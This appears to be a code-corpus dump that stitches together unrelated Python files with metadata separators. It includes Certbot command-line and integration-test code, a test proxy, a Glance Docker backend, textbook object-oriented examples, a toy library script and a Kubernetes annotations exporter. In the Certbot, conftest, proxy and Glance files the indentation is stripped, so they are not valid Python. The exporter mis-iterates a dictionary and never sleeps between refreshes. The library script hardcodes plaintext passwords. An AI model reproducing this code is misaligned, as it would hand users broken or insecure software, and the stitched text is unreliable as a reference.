[None, "certonly", "renew", "run"],
"--preferred-chain", dest="preferred_chain",
default=flag_default("preferred_chain"), help=config_help("preferred_chain")
)
helpful.add(
["manual", "standalone", "certonly", "renew"],
"--preferred-challenges", dest="pref_challs",
action=_PrefChallAction, default=flag_default("pref_challs"),
help='A sorted, comma delimited list of the preferred challenge to '
'use during authorization with the most preferred challenge '
'listed first (Eg, "dns" or "http,dns"). '
'Not all plugins support all challenges. See '
'https://certbot.eff.org/docs/using.html#plugins for details. '
'ACME Challenges are versioned, but if you pick "http" rather '
'than "http-01", Certbot will select the latest version '
'automatically.')
helpful.add(
"renew", "--pre-hook",
help="Command to be run in a shell before obtaining any certificates."
" Intended primarily for renewal, where it can be used to temporarily"
" shut down a webserver that might conflict with the standalone"
" plugin. This will only be called if a certificate is actually to be"
" obtained/renewed. When renewing several certificates that have"
" identical pre-hooks, only the first will be executed.")
helpful.add(
"renew", "--post-hook",
help="Command to be run in a shell after attempting to obtain/renew"
" certificates. Can be used to deploy renewed certificates, or to"
" restart any servers that were stopped by --pre-hook. This is only"
" run if an attempt was made to obtain/renew a certificate. If"
" multiple renewed certificates have identical post-hooks, only"
" one will be run.")
helpful.add("renew", "--renew-hook",
action=_RenewHookAction, help=argparse.SUPPRESS)
helpful.add(
"renew", "--no-random-sleep-on-renew", action="store_false",
default=flag_default("random_sleep_on_renew"), dest="random_sleep_on_renew",
help=argparse.SUPPRESS)
helpful.add(
"renew", "--deploy-hook", action=_DeployHookAction,
help='Command to be run in a shell once for each successfully'
' issued certificate. For this command, the shell variable'
' $RENEWED_LINEAGE will point to the config live subdirectory'
' (for example, "/etc/letsencrypt/live/example.com") containing'
' the new certificates and keys; the shell variable'
' $RENEWED_DOMAINS will contain a space-delimited list of'
' renewed certificate domains (for example, "example.com'
        ' www.example.com")')
helpful.add(
"renew", "--disable-hook-validation",
action="store_false", dest="validate_hooks",
default=flag_default("validate_hooks"),
help="Ordinarily the commands specified for"
" --pre-hook/--post-hook/--deploy-hook will be checked for"
" validity, to see if the programs being run are in the $PATH,"
" so that mistakes can be caught early, even when the hooks"
" aren't being run just yet. The validation is rather"
" simplistic and fails if you use more advanced shell"
" constructs, so you can use this switch to disable it."
" (default: False)")
helpful.add(
"renew", "--no-directory-hooks", action="store_false",
default=flag_default("directory_hooks"), dest="directory_hooks",
help="Disable running executables found in Certbot's hook directories"
" during renewal. (default: False)")
helpful.add(
"renew", "--disable-renew-updates", action="store_true",
default=flag_default("disable_renew_updates"), dest="disable_renew_updates",
help="Disable automatic updates to your server configuration that"
" would otherwise be done by the selected installer plugin, and triggered"
" when the user executes \"certbot renew\", regardless of if the certificate"
" is renewed. This setting does not apply to important TLS configuration"
" updates.")
helpful.add(
"renew", "--no-autorenew", action="store_false",
default=flag_default("autorenew"), dest="autorenew",
help="Disable auto renewal of certificates.")
# Deprecated arguments
helpful.add_deprecated_argument("--os-packages-only", 0)
helpful.add_deprecated_argument("--no-self-upgrade", 0)
helpful.add_deprecated_argument("--no-bootstrap", 0)
helpful.add_deprecated_argument("--no-permissions-check", 0)
# Populate the command line parameters for new style enhancements
enhancements.populate_cli(helpful.add)
_create_subparsers(helpful)
_paths_parser(helpful)
# _plugins_parsing should be the last thing to act upon the main
# parser (--help should display plugin-specific options last)
_plugins_parsing(helpful, plugins)
if not detect_defaults:
global helpful_parser # pylint: disable=global-statement
helpful_parser = helpful
return helpful.parse_args()
def set_by_cli(var):
"""
Return True if a particular config variable has been set by the user
(CLI or config file) including if the user explicitly set it to the
default. Returns False if the variable was assigned a default value.
"""
# We should probably never actually hit this code. But if we do,
# a deprecated option has logically never been set by the CLI.
if var in DEPRECATED_OPTIONS:
return False
detector = set_by_cli.detector # type: ignore
if detector is None and helpful_parser is not None:
# Setup on first run: `detector` is a weird version of config in which
# the default value of every attribute is wrangled to be boolean-false
plugins = plugins_disco.PluginsRegistry.find_all()
# reconstructed_args == sys.argv[1:], or whatever was passed to main()
reconstructed_args = helpful_parser.args + [helpful_parser.verb]
detector = set_by_cli.detector = prepare_and_parse_args( # type: ignore
plugins, reconstructed_args, detect_defaults=True)
# propagate plugin requests: eg --standalone modifies config.authenticator
detector.authenticator, detector.installer = ( # type: ignore
plugin_selection.cli_plugin_requests(detector))
if not isinstance(getattr(detector, var), _Default):
logger.debug("Var %s=%s (set by user).", var, getattr(detector, var))
return True
for modifier in VAR_MODIFIERS.get(var, []):
if set_by_cli(modifier):
logger.debug("Var %s=%s (set by user).",
var, VAR_MODIFIERS.get(var, []))
return True
return False
# static housekeeping var
# functions attributed are not supported by mypy
# https://github.com/python/mypy/issues/2087
set_by_cli.detector = None # type: ignore
def has_default_value(option, value):
"""Does option have the default value?
If the default value of option is not known, False is returned.
:param str option: configuration variable being considered
:param value: value of the configuration variable named option
:returns: True if option has the default value, otherwise, False
:rtype: bool
"""
if helpful_parser is not None:
return (option in helpful_parser.defaults and
helpful_parser.defaults[option] == value)
return False
def option_was_set(option, value):
"""Was option set by the user or does it differ from the default?
:param str option: configuration variable being considered
:param value: value of the configuration variable named option
:returns: True if the option was set, otherwise, False
:rtype: bool
"""
# If an option is deprecated, it was effectively not set by the user.
if option in DEPRECATED_OPTIONS:
return False
return set_by_cli(option) or not has_default_value(option, value)
def argparse_type(variable):
"""Return our argparse type function for a config variable (default: str)"""
# pylint: disable=protected-access
if helpful_parser is not None:
for action in helpful_parser.parser._actions:
if action.type is not None and action.dest == variable:
return action.type
return str
```
#### File: certbot-ci/certbot_integration_tests/conftest.py
```python
import contextlib
import subprocess
import sys
from certbot_integration_tests.utils import acme_server as acme_lib
from certbot_integration_tests.utils import dns_server as dns_lib
def pytest_addoption(parser):
"""
Standard pytest hook to add options to the pytest parser.
:param parser: current pytest parser that will be used on the CLI
"""
parser.addoption('--acme-server', default='pebble',
choices=['boulder-v1', 'boulder-v2', 'pebble'],
help='select the ACME server to use (boulder-v1, boulder-v2, '
'pebble), defaulting to pebble')
parser.addoption('--dns-server', default='challtestsrv',
choices=['bind', 'challtestsrv'],
help='select the DNS server to use (bind, challtestsrv), '
'defaulting to challtestsrv')
def pytest_configure(config):
"""
Standard pytest hook used to add a configuration logic for each node of a pytest run.
:param config: the current pytest configuration
"""
if not hasattr(config, 'slaveinput'): # If true, this is the primary node
with _print_on_err():
_setup_primary_node(config)
def pytest_configure_node(node):
"""
Standard pytest-xdist hook used to configure a worker node.
:param node: current worker node
"""
node.slaveinput['acme_xdist'] = node.config.acme_xdist
node.slaveinput['dns_xdist'] = node.config.dns_xdist
@contextlib.contextmanager
def _print_on_err():
"""
    During pytest-xdist setup, stdout is used for node communication, so print is useless.
    However, stderr is still available. This context manager transfers stdout to stderr
    for the duration of the context, allowing prints to be displayed to the user.
"""
old_stdout = sys.stdout
sys.stdout = sys.stderr
try:
yield
finally:
sys.stdout = old_stdout
def _setup_primary_node(config):
"""
Setup the environment for integration tests.
This function will:
- check runtime compatibility (Docker, docker-compose, Nginx)
- create a temporary workspace and the persistent GIT repositories space
- configure and start a DNS server using Docker, if configured
- configure and start paralleled ACME CA servers using Docker
- transfer ACME CA and DNS servers configurations to pytest nodes using env variables
This function modifies `config` by injecting the ACME CA and DNS server configurations,
in addition to cleanup functions for those servers.
:param config: Configuration of the pytest primary node. Is modified by this function.
"""
# Check for runtime compatibility: some tools are required to be available in PATH
if 'boulder' in config.option.acme_server:
try:
subprocess.check_output(['docker', '-v'], stderr=subprocess.STDOUT)
except (subprocess.CalledProcessError, OSError):
            raise ValueError('Error: docker is required in PATH to launch the integration tests on '
'boulder, but is not installed or not available for current user.')
try:
subprocess.check_output(['docker-compose', '-v'], stderr=subprocess.STDOUT)
except (subprocess.CalledProcessError, OSError):
raise ValueError(
'Error: docker-compose is required in PATH to launch the integration tests, '
'but is not installed or not available for current user.'
)
# Parameter numprocesses is added to option by pytest-xdist
workers = ['primary'] if not config.option.numprocesses\
else ['gw{0}'.format(i) for i in range(config.option.numprocesses)]
# If a non-default DNS server is configured, start it and feed it to the ACME server
dns_server = None
acme_dns_server = None
if config.option.dns_server == 'bind':
dns_server = dns_lib.DNSServer(workers)
config.add_cleanup(dns_server.stop)
print('DNS xdist config:\n{0}'.format(dns_server.dns_xdist))
dns_server.start()
acme_dns_server = '{}:{}'.format(
dns_server.dns_xdist['address'],
dns_server.dns_xdist['port']
)
# By calling setup_acme_server we ensure that all necessary acme server instances will be
# fully started. This runtime is reflected by the acme_xdist returned.
acme_server = acme_lib.ACMEServer(config.option.acme_server, workers,
dns_server=acme_dns_server)
config.add_cleanup(acme_server.stop)
print('ACME xdist config:\n{0}'.format(acme_server.acme_xdist))
acme_server.start()
config.acme_xdist = acme_server.acme_xdist
config.dns_xdist = dns_server.dns_xdist if dns_server else None
```
#### File: certbot_integration_tests/utils/proxy.py
```python
import http.server as BaseHTTPServer
import json
import re
import sys
import requests
from certbot_integration_tests.utils.misc import GracefulTCPServer
def _create_proxy(mapping):
# pylint: disable=missing-function-docstring
class ProxyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
# pylint: disable=missing-class-docstring
def do_GET(self):
headers = {key.lower(): value for key, value in self.headers.items()}
backend = [backend for pattern, backend in mapping.items()
if re.match(pattern, headers['host'])][0]
response = requests.get(backend + self.path, headers=headers)
self.send_response(response.status_code)
for key, value in response.headers.items():
self.send_header(key, value)
self.end_headers()
self.wfile.write(response.content)
return ProxyHandler
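
# Invocation sketch (values illustrative): the first CLI argument is the port to
# listen on, the second is a JSON object mapping a Host-header regex to a backend
# base URL, e.g.:
#     python proxy.py 8080 '{"acme\\.example\\.com": "http://127.0.0.1:5002"}'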
if __name__ == '__main__':
http_port = int(sys.argv[1])
port_mapping = json.loads(sys.argv[2])
httpd = GracefulTCPServer(('', http_port), _create_proxy(port_mapping))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
```
#### File: certbot-ci/windows_installer_integration_tests/conftest.py
```python
import os
ROOT_PATH = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
def pytest_addoption(parser):
"""
Standard pytest hook to add options to the pytest parser.
:param parser: current pytest parser that will be used on the CLI
"""
parser.addoption('--installer-path',
default=os.path.join(ROOT_PATH, 'windows-installer', 'build',
'nsis', 'certbot-beta-installer-win32.exe'),
help='set the path of the windows installer to use, default to '
'CERTBOT_ROOT_PATH\\windows-installer\\build\\nsis\\certbot-beta-installer-win32.exe')
parser.addoption('--allow-persistent-changes', action='store_true',
help='needs to be set, and confirm that the test will make persistent changes on this machine')
def pytest_configure(config):
"""
Standard pytest hook used to add a configuration logic for each node of a pytest run.
:param config: the current pytest configuration
"""
if not config.option.allow_persistent_changes:
raise RuntimeError('This integration test would install Certbot on your machine. '
'Please run it again with the `--allow-persistent-changes` flag set to acknowledge.')
``` |
{
"source": "4n3i5v74/openstack-docker",
"score": 2
} |
#### File: contrib/DEPRECATED_glance-db-backend/api.py
```python
import functools
import hashlib
import httplib
import urllib
import json
import glance.openstack.common.log as logging
from glance.openstack.common import timeutils
LOG = logging.getLogger(__name__)
IMAGES_CACHE = []
def log_call(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
LOG.info(_('Calling %(funcname)s: args=%(args)s, kwargs=%(kwargs)s') %
{"funcname": func.__name__,
"args": args,
"kwargs": kwargs})
try:
output = func(*args, **kwargs)
LOG.info(_('Returning %(funcname)s: %(output)s') %
{"funcname": func.__name__,
"output": output})
return output
except Exception as e:
LOG.exception(type(e))
return wrapped
def _make_uuid(val):
""" Generate a fake UUID from a string to be compliant with the API
    It uses an MD5 hash to return the same UUID for a given string.
"""
h = hashlib.md5(val).hexdigest()
return '{0}-{1}-{2}-{3}-{4}'.format(
h[:8], h[8:12], h[12:16], h[16:20], h[20:])
def _image_format(image_name, **values):
dt = timeutils.utcnow()
image = {
'id': _make_uuid(image_name),
'name': image_name,
'owner': None,
'locations': [],
'status': 'active',
'protected': False,
'is_public': True,
'container_format': 'docker',
'disk_format': 'docker',
'min_ram': 0,
'min_disk': 0,
'size': 0,
'checksum': None,
'tags': [],
'created_at': dt,
'updated_at': dt,
'deleted_at': None,
'deleted': False,
}
properties = values.pop('properties', {})
properties = [{'name': k,
'value': v,
'deleted': False} for k, v in properties.items()]
image['properties'] = properties
image.update(values)
return image
def _docker_search(term):
""" Interface to the Docker search API """
http_conn = httplib.HTTPConnection('localhost', 4243)
http_conn.request('GET',
'/images/search?term={0}'.format(urllib.quote(term)))
resp = http_conn.getresponse()
data = resp.read()
if resp.status != 200:
return []
return [repos['Name'] for repos in json.loads(data)]
def _init_cache():
global IMAGES_CACHE
if not IMAGES_CACHE:
IMAGES_CACHE = _docker_search('library')
def reset():
pass
def setup_db_env(*args, **kwargs):
pass
@log_call
def image_get(context, image_id, session=None, force_show_deleted=False):
images = [_image_format(i) for i in IMAGES_CACHE]
for i in images:
if i['id'] == image_id:
return i
@log_call
def image_get_all(context, filters=None, marker=None, limit=None,
sort_key='created_at', sort_dir='desc',
member_status='accepted', is_public=None,
admin_as_user=False):
_init_cache()
return [_image_format(i) for i in IMAGES_CACHE]
@log_call
def image_property_create(context, values):
pass
@log_call
def image_property_delete(context, prop_ref, session=None):
pass
@log_call
def image_member_find(context, image_id=None, member=None, status=None):
pass
@log_call
def image_member_create(context, values):
pass
@log_call
def image_member_update(context, member_id, values):
pass
@log_call
def image_member_delete(context, member_id):
pass
@log_call
def image_create(context, image_values):
global IMAGES_CACHE
_init_cache()
name = image_values.get('name')
if not name:
return
if '/' in name:
IMAGES_CACHE.append(name)
else:
images = _docker_search(name)
if not images:
return
for i in images:
if i not in IMAGES_CACHE:
IMAGES_CACHE.append(i)
return _image_format(name)
@log_call
def image_update(context, image_id, image_values, purge_props=False):
pass
@log_call
def image_destroy(context, image_id):
pass
@log_call
def image_tag_get_all(context, image_id):
pass
@log_call
def image_tag_get(context, image_id, value):
pass
@log_call
def image_tag_set_all(context, image_id, values):
pass
@log_call
def image_tag_create(context, image_id, value):
pass
@log_call
def image_tag_delete(context, image_id, value):
pass
def is_image_mutable(context, image):
return False
def is_image_sharable(context, image, **kwargs):
return True
def is_image_visible(context, image, status=None):
return True
``` |
{
"source": "4n3i5v74/Python-3-Object-Oriented-Programming-Third-Edition",
"score": 4
} |
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter02/inner_class.py
```python
def format_string(string, formatter=None):
"""Format a string using the formatter object, which
is expected to have a format() method that accepts
a string."""
class DefaultFormatter:
"""Format a string in title case."""
def format(self, string):
return str(string).title()
if not formatter:
formatter = DefaultFormatter()
return formatter.format(string)
hello_string = "hello world, how are you today?"
print(" input: " + hello_string)
print("output: " + format_string(hello_string))
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter02/point.py
```python
import math
class Point:
"Represents a point in two-dimensional geometric coordinates"
def __init__(self, x=0, y=0):
"""Initialize the position of a new point. The x and y
coordinates can be specified. If they are not, the
point defaults to the origin."""
self.move(x, y)
def move(self, x, y):
"Move the point to a new location in 2D space."
self.x = x
self.y = y
def reset(self):
"Reset the point back to the geometric origin: 0, 0"
self.move(0, 0)
def calculate_distance(self, other_point):
"""Calculate the distance from this point to a second
point passed as a parameter.
This function uses the Pythagorean Theorem to calculate
the distance between the two points. The distance is
returned as a float."""
return math.sqrt(
(self.x - other_point.x) ** 2
+ (self.y - other_point.y) ** 2
)
# how to use it:
point1 = Point()
point2 = Point()
point1.reset()
point2.move(5, 0)
print(point2.calculate_distance(point1))
assert point2.calculate_distance(point1) == point1.calculate_distance(
point2
)
point1.move(3, 4)
print(point1.calculate_distance(point2))
print(point1.calculate_distance(point1))
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter04/even_integers.py
```python
class EvenOnly(list):
def append(self, integer):
if not isinstance(integer, int):
raise TypeError("Only integers can be added")
if integer % 2:
raise ValueError("Only even numbers can be added")
super().append(integer)
```
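A short usage sketch for `EvenOnly`: note that only `append` is overridden, so other mutators inherited from `list` (such as `extend`, `insert`, or constructing from an iterable) still bypass the checks.
```python
evens = EvenOnly()
evens.append(2)          # accepted: even integer
try:
    evens.append(3)      # raises ValueError: odd
except ValueError as err:
    print(err)
try:
    evens.append("a")    # raises TypeError: not an int
except TypeError as err:
    print(err)
evens.extend([1, 3, 5])  # silently accepted, since extend() is not overridden
print(evens)             # [2, 1, 3, 5]
```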
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter06/dataclass_stocks.py
```python
from dataclasses import make_dataclass, dataclass
# using make_dataclass
Stock = make_dataclass("Stock", ["symbol", "current", "high", "low"])
stock = Stock("FB", 177.46, high=178.67, low=175.79)
# compared to regular object
class StockRegClass:
def __init__(self, name, current, high, low):
self.name = name
self.current = current
self.high = high
self.low = low
stock_reg_class = StockRegClass("FB", 177.46, high=178.67, low=175.79)
# using dataclass decorator
@dataclass
class StockDecorated:
name: str
current: float
high: float
low: float
stock_decorated = StockDecorated("FB", 177.46, high=178.67, low=175.79)
@dataclass
class StockDefaults:
name: str
current: float = 0.0
high: float = 0.0
low: float = 0.0
stock_defaults = StockDefaults("FB")
@dataclass(order=True)
class StockOrdered:
name: str
current: float = 0.0
high: float = 0.0
low: float = 0.0
stock_ordered1 = StockOrdered("FB", 177.46, high=178.67, low=175.79)
stock_ordered2 = StockOrdered("FB")
stock_ordered3 = StockOrdered("FB", 178.42, high=179.28, low=176.39)
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter06/using_dictionaries.py
```python
stocks = {
"GOOG": (1235.20, 1242.54, 1231.06),
"MSFT": (110.41, 110.45, 109.84),
}
random_keys = {}
random_keys["astring"] = "somestring"
random_keys[5] = "aninteger"
random_keys[25.2] = "floats work too"
random_keys[("abc", 123)] = "so do tuples"
class AnObject:
def __init__(self, avalue):
self.avalue = avalue
my_object = AnObject(14)
random_keys[my_object] = "We can even store objects"
my_object.avalue = 12
try:
random_keys[[1, 2, 3]] = "we can't store lists though"
except:
print("unable to store list\n")
for key, value in random_keys.items():
print("{} has value {}".format(key, value))
```
#### File: Chapter09/Case Study_ Machine Learning/machine_learn.py
```python
import csv
from random import randint
from collections import Counter
dataset_filename = "colors.csv"
def hex_to_rgb(hex_color):
return tuple(int(hex_color[i : i + 2], 16) for i in range(1, 6, 2))
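# Example: hex_to_rgb("#ff0080") -> (255, 0, 128); the leading "#" is skipped
# because slicing starts at index 1.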
def load_colors(filename):
with open(filename) as dataset_file:
lines = csv.reader(dataset_file)
for line in lines:
label, hex_color = line
yield (hex_to_rgb(hex_color), label)
def generate_colors(count=100):
for i in range(count):
yield (randint(0, 255), randint(0, 255), randint(0, 255))
def color_distance(color1, color2):
channels = zip(color1, color2)
sum_distance_squared = 0
for c1, c2 in channels:
sum_distance_squared += (c1 - c2) ** 2
return sum_distance_squared
def nearest_neighbors(model_colors, target_colors, num_neighbors=5):
model_colors = list(model_colors)
for target in target_colors:
distances = sorted(
((color_distance(c[0], target), c) for c in model_colors)
)
yield target, [d[1] for d in distances[:num_neighbors]]
def name_colors(model_colors, target_colors, num_neighbors=5):
for target, near in nearest_neighbors(
model_colors, target_colors, num_neighbors=5
):
name_guess = Counter(n[1] for n in near).most_common()[0][0]
yield target, name_guess
def write_results(colors, filename="output.csv"):
with open(filename, "w") as file:
writer = csv.writer(file)
for (r, g, b), name in colors:
writer.writerow([name, f"#{r:02x}{g:02x}{b:02x}"])
def process_colors(dataset_filename="colors.csv"):
model_colors = load_colors(dataset_filename)
colors = name_colors(model_colors, generate_colors(), 5)
write_results(colors)
if __name__ == "__main__":
process_colors()
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter11/formatter_factory.py
```python
class FranceDateFormatter:
def format_date(self, y, m, d):
y, m, d = (str(x) for x in (y, m, d))
y = "20" + y if len(y) == 2 else y
m = "0" + m if len(m) == 1 else m
d = "0" + d if len(d) == 1 else d
return "{0}/{1}/{2}".format(d, m, y)
class USADateFormatter:
def format_date(self, y, m, d):
y, m, d = (str(x) for x in (y, m, d))
y = "20" + y if len(y) == 2 else y
m = "0" + m if len(m) == 1 else m
d = "0" + d if len(d) == 1 else d
return "{0}-{1}-{2}".format(m, d, y)
class FranceCurrencyFormatter:
def format_currency(self, base, cents):
base, cents = (str(x) for x in (base, cents))
if len(cents) == 0:
cents = "00"
elif len(cents) == 1:
cents = "0" + cents
digits = []
for i, c in enumerate(reversed(base)):
if i and not i % 3:
digits.append(" ")
digits.append(c)
base = "".join(reversed(digits))
return "{0}€{1}".format(base, cents)
class USACurrencyFormatter:
def format_currency(self, base, cents):
base, cents = (str(x) for x in (base, cents))
if len(cents) == 0:
cents = "00"
elif len(cents) == 1:
cents = "0" + cents
digits = []
for i, c in enumerate(reversed(base)):
if i and not i % 3:
digits.append(",")
digits.append(c)
base = "".join(reversed(digits))
return "${0}.{1}".format(base, cents)
class USAFormatterFactory:
def create_date_formatter(self):
return USADateFormatter()
def create_currency_formatter(self):
return USACurrencyFormatter()
class FranceFormatterFactory:
def create_date_formatter(self):
return FranceDateFormatter()
def create_currency_formatter(self):
return FranceCurrencyFormatter()
country_code = "US"
factory_map = {"US": USAFormatterFactory, "FR": FranceFormatterFactory}
formatter_factory = factory_map.get(country_code)()
```
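A brief usage sketch for the factory selected above; the expected outputs follow directly from the US formatter implementations shown.
```python
date_formatter = formatter_factory.create_date_formatter()
currency_formatter = formatter_factory.create_currency_formatter()
print(date_formatter.format_date(21, 6, 4))             # 06-04-2021
print(currency_formatter.format_currency(1402433, 12))  # $1,402,433.12
```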
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter12/average_raises.py
```python
import unittest
def average(seq):
return sum(seq) / len(seq)
class TestAverage(unittest.TestCase):
def test_zero(self):
self.assertRaises(ZeroDivisionError, average, [])
def test_with_zero(self):
with self.assertRaises(ZeroDivisionError):
average([])
if __name__ == "__main__":
unittest.main()
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter12/test_statslist_setup.py
```python
from stats import StatsList
import unittest
class TestValidInputs(unittest.TestCase):
def setUp(self):
self.stats = StatsList([1, 2, 2, 3, 3, 4])
def test_mean(self):
self.assertEqual(self.stats.mean(), 2.5)
def test_median(self):
self.assertEqual(self.stats.median(), 2.5)
self.stats.append(4)
self.assertEqual(self.stats.median(), 3)
def test_mode(self):
self.assertEqual(self.stats.mode(), [2, 3])
self.stats.remove(2)
self.assertEqual(self.stats.mode(), [3])
if __name__ == "__main__":
unittest.main()
```
#### File: Python-3-Object-Oriented-Programming-Third-Edition/Chapter13/sort_service.py
```python
import asyncio
import json
from concurrent.futures import ProcessPoolExecutor
def sort_in_process(data):
nums = json.loads(data.decode())
curr = 1
while curr < len(nums):
if nums[curr] >= nums[curr - 1]:
curr += 1
else:
nums[curr], nums[curr - 1] = nums[curr - 1], nums[curr]
if curr > 1:
curr -= 1
return json.dumps(nums).encode()
async def sort_request(reader, writer):
print("Received connection")
length = await reader.read(8)
data = await reader.readexactly(int.from_bytes(length, "big"))
result = await asyncio.get_event_loop().run_in_executor(
None, sort_in_process, data
)
print("Sorted list")
writer.write(result)
writer.close()
print("Connection closed")
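
# Wire protocol implemented by sort_request above: the client sends an 8-byte
# big-endian length prefix followed by that many bytes of JSON (a list of
# numbers), and reads back the sorted list as JSON. A minimal client sketch
# (illustrative, not part of this module):
#
#     reader, writer = await asyncio.open_connection("127.0.0.1", 2015)
#     data = json.dumps([3, 1, 2]).encode()
#     writer.write(len(data).to_bytes(8, "big") + data)
#     print(json.loads(await reader.read()))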
loop = asyncio.get_event_loop()
loop.set_default_executor(ProcessPoolExecutor())
server = loop.run_until_complete(
asyncio.start_server(sort_request, "127.0.0.1", 2015)
)
print("Sort Service running")
loop.run_forever()
server.close()
loop.run_until_complete(server.wait_closed())
loop.close()
``` |
{
"source": "4n3i5v74/Python-CGI",
"score": 4
} |
#### File: 4n3i5v74/Python-CGI/library.py
```python
users = {'parker': 'password', 'ruth': 'password'}
user_permissions = {'parker': 'reader', 'ruth': 'librarian'}
is_librarian = 0
books = {}
def login(user, pwd):
global users
    global user_permissions
    global is_librarian
if user in users:
if pwd == users[user]:
print "You're logged in"
if user_permissions[user] == "librarian":
print "You're logged in as a librarian"
is_librarian = 1
return 1
else:
return 0
else:
print "User does not exist"
return 0
return 0
def add(user, password, usertype):
global users
global user_permissions
if not users.has_key(user):
users[user] = password
user_permissions[user] = usertype
return 1
else:
print "User already exists"
return 0
return 0
def delete(user):
global users
global user_permissions
if users.has_key(user):
del users[user]
del user_permissions[user]
return 1
else:
print "User doesn't exist"
return 0
return 0
def add_book(title, status):
global books
if not books.has_key(title):
books[title] = status
return 1
else:
print "Book already in the inventory! Sorry!"
return 0
return 0
def del_book(title, status):
global books
if books.has_key(title):
del books[title]
return 1
else:
print "Book not in inventory"
return 0
return 0
def borrow(title):
global books
if books.has_key(title) and books[title] != "borrowed":
books[title] = "borrowed"
        print "%s has been borrowed. You have 2 weeks to enjoy it before it's due." % title
return 1
else:
print "Looks like either the book doesn't exist or it's currently borrowed."
return 0
return 0
def retur(title):
global books
if books.has_key(title) and books[title] == "borrowed":
books[title] = "in stock"
print "You've successfully returned your book"
return 1
else:
print "Looks like either the book is in stock already or the book isn't in the database"
return 0
return 0
username = str(raw_input("Enter your username: "))
password = str(raw_input("Enter your password: "))
# Validate the entered credentials before entering the menu loop
if login(username, password):
    choice = 1
else:
    choice = 0
while choice:
print "What would you like to do? (enter 0 to quit)"
print "1: add user"
print "2: delete user"
if is_librarian:
print '''3: add book
4: delete book
5: borrow book
6: return book'''
else:
print '''3: borrow book
4: return book'''
choice = int(raw_input("So what'll it be? "))
print "This menu has not been implemented yet"
choice = 0
``` |
{
"source": "4n4nd/k8s-annotations-exporter",
"score": 2
} |
#### File: src/k8s_annotations_exporter/export.py
```python
import argparse
import logging
import sys
import time
from kubernetes import client, config, dynamic, watch
from prometheus_client import REGISTRY, start_http_server
from prometheus_client.core import InfoMetricFamily
from k8s_annotations_exporter import __version__
__author__ = "<NAME>"
__copyright__ = "<NAME>"
__license__ = "MIT"
_logger = logging.getLogger(__name__)
MAX_METRIC_LABEL_VALUE_LENGTH = 100
class CustomCollector:
def __init__(self, metric_family=None) -> None:
self.metric_family = metric_family
def collect(self):
return [self.metric_family]
def update(self, metric_family) -> None:
self.metric_family = metric_family
def fetch_metric_data(k8s_config, search_params):
metric_data = []
# Creating a dynamic k8s client
k8s_client = dynamic.DynamicClient(
client.api_client.ApiClient(configuration=k8s_config)
)
watcher = watch.Watch()
for e in k8s_client.resources.get(**search_params).watch(
timeout=5, watcher=watcher
):
resource_metric = {}
if not e["object"].metadata.annotations:
continue
resource_metric["api_version"] = e["object"].apiVersion
resource_metric["kind"] = e["object"].kind
resource_metric["name"] = e["object"].metadata.name
for key, value in e["object"].metadata.annotations:
resource_metric[
"annotation_"
+ key.replace(".", "_").replace("/", "_").replace("-", "_")
] = value
metric_data.append(resource_metric)
# Gracefully stop the stream watcher
watcher.stop()
_logger.debug("Collected metric data for {} resources".format(len(metric_data)))
return metric_data
def update_metric(metric_collector, metric_data):
metric_collector.update(
InfoMetricFamily(
"k8s_resource_annotations", "Annotations set in a k8s resource"
)
)
if not metric_data:
_logger.debug("No resources found")
for metric in metric_data:
metric_collector.metric_family.add_metric(metric.keys(), metric)
def parse_args(args):
"""Parse command line parameters
Args:
args (List[str]): command line parameters as list of strings
(for example ``["--help"]``).
Returns:
:obj:`argparse.Namespace`: command line parameters namespace
"""
parser = argparse.ArgumentParser(
description="""Exporter to export Kubernetes resource annotations
as Prometheus metrics"""
)
parser.add_argument(
"--version",
action="version",
version="k8s-annotations-exporter {ver}".format(ver=__version__),
)
parser.add_argument(
"--kube-config-file",
help="""Kube config file location. If no argument provided,
the config will be loaded from default location.""",
)
parser.add_argument(
"--in-cluster",
help="Set this flag when running within the cluster, to use a serviceaccount",
action="store_const",
const=True,
default=False,
)
parser.add_argument(
"--metrics-refresh-interval",
help="Metric data refresh interval in seconds",
type=int,
default=60,
)
parser.add_argument(
"--http-server-port",
help="Port number to start the metrics HTTP server. Default: 8000",
type=int,
default=8000,
)
parser.add_argument(
"--resource-api-version",
help="Kubernetes resource API version. Default: v1",
type=str,
default="v1",
)
parser.add_argument(
"--resource-kind",
help="Kubernetes resource kind. Default: Namespace",
type=str,
default="Namespace",
)
parser.add_argument(
"-v",
"--verbose",
dest="loglevel",
help="set loglevel to INFO",
action="store_const",
const=logging.INFO,
)
parser.add_argument(
"-vv",
"--very-verbose",
dest="loglevel",
help="set loglevel to DEBUG",
action="store_const",
const=logging.DEBUG,
)
return parser.parse_args(args)
def setup_logging(loglevel):
"""Setup basic logging
Args:
loglevel (int): minimum loglevel for emitting messages
"""
logformat = "[%(asctime)s] %(levelname)s:%(name)s:%(message)s"
logging.basicConfig(
level=loglevel, stream=sys.stdout, format=logformat, datefmt="%Y-%m-%d %H:%M:%S"
)
def main(args):
"""Wrapper allowing :func:`fib` to be called with string arguments in a CLI fashion
Instead of returning the value from :func:`fib`, it prints the result to the
``stdout`` in a nicely formatted message.
Args:
args (List[str]): command line parameters as list of strings
(for example ``["--verbose", "42"]``).
"""
args = parse_args(args)
setup_logging(args.loglevel)
if args.in_cluster:
# if in-cluster mode is set in args, try using the incluster serviceaccount
k8s_config = config.load_incluster_config()
else:
k8s_config = config.load_kube_config(config_file=args.kube_config_file)
search_params = {
"api_version": args.resource_api_version,
"kind": args.resource_kind,
}
_logger.info("Kubernetes resource search parameters: {0}".format(search_params))
metric_collector = CustomCollector(
InfoMetricFamily(
"k8s_resource_annotations", "Annotations set in a k8s resource"
)
)
start_http_server(args.http_server_port)
_logger.info("HTTP server started at port: {0}".format(args.http_server_port))
REGISTRY.register(metric_collector)
_logger.info(
"Metrics will be refreshed every {0} seconds".format(
args.metrics_refresh_interval
)
)
while True:
update_metric(metric_collector, fetch_metric_data(k8s_config, search_params))
